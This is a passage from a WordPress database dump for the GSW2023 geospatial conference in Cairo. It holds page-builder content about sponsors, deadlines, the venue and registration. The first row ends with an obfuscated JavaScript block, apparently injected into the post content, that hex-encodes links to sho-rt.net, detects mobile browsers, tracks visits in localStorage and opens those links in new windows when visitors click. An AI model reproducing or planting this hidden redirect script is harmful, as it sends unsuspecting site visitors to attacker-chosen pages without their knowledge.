2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 06:00:00','2023-05-17 06:00:00','',3066,'https://gsw2023.com/?p=4539',0,'revision','',0),
(4540,1,'2023-05-17 06:04:50','2023-05-17 06:04:50','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt; color: #ffffff;\">BOOK YOUR HOTEL NOW</span></strong></h4>\n<h4></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">(InterContinental Cairo Semiramis)</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684303448841{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 